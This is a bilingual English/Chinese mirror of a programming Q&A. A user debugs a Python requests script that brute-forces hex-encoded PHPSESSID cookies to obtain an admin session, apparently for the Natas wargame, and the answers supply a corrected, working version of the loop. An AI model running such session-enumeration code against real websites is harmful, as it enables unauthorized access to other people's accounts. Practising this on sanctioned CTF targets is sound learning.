[英]Python Requests - Cookies error
I am trying to bruteforce a session via sending random cookies until the correct cookie gives me an admin session. 我试图通过发送随机cookie来强制执行会话,直到正确的cookie给我一个管理会话。 I am using python 3.6 on Windows 10.
我在Windows 10上使用python 3.6。
The cookie I want to use is PHPSESSID and I have set it to a hex encoded string consisting of "#-admin". 我想要使用的cookie是PHPSESSID,我已将其设置为由“#admin”组成的十六进制编码字符串。 The website gives a random PHPSESSID that is hex encoded, but only the number changes ('-admin' is consistent after every refresh).
该网站提供了一个十六进制编码的随机PHPSESSID,但只有数字更改('-admin'在每次刷新后都是一致的)。 The source code maxes out the number to 640 hence the range.
源代码将数字最大化为640,因此范围。
The code is below: 代码如下:
for x in range(1,641):
if x % 10 == 0:
print (str(x) + ' Sessions Tested')
cookies = dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii')+b'-admin')))
r = requests.get(target, cookies=cookies)
if r.text.find(trueStr) != -1:
print ('Got it!')
I receive the following error after running the script on windows: 在Windows上运行脚本后收到以下错误:
Traceback (most recent call last):
File "natas19.py", line 14, in <module>
r = requests.get(target, cookies=cookies)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 494, in request
prep = self.prepare_request(req)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 415, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 518, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 345, in set_cookie
if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
I have no idea where to start. 我不知道从哪里开始。 I followed the documentation for python requests.
我按照python请求的文档。 Any suggestions on where to look would be greatly appreciated.
任何关于在哪里看的建议将不胜感激。
Cookie values must be str
objects, but binascii.hexlify()
returns a bytes
object: Cookie值必须是
str
对象,但binascii.hexlify()
返回一个bytes
对象:
>>> import binascii
>>> x = 1
>>> binascii.hexlify(str(x).encode('ascii')+b'-admin')
b'312d61646d696e'
Decode that first: 首先解码:
cookies = {
'PHPSESSID': binascii.hexlify(b'%d-admin' % x).decode('ascii')
}
In your example, cookies
is a dict
set by: 在您的示例中,
cookies
是由以下各项设置的dict
:
dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii') + b'-admin')))
If you break up the steps of that one-liner, you'll see the problem: 如果你打破了那个单行的步骤,你会看到问题:
>>> binascii.hexlify(str(x).encode('ascii') + b'-admin')
b'312d61646d696e'
>>> b'312d61646d696e'.startswith('3')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
You're performing a bytes
operation with a str
first arg. 您正在使用
str
first arg执行bytes
操作。 Since it's the requests
package managing your cookies, convert the value to a str
before setting PHPSESSID
. 由于是管理cookie的
requests
包,因此在设置PHPSESSID
之前将值转换为str
。
for x in range(1,641):
if x % 10 == 0:
print (str(x) + ' Sessions Tested')
b_sess_id = binascii.hexlify(str(x).encode('ascii')+b'-admin'))
cookies = dict(PHPSESSID=b_sess_id.decode())
r = requests.get(target, cookies=cookies)
if r.text.find(trueStr) != -1:
print ('Got it!')
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.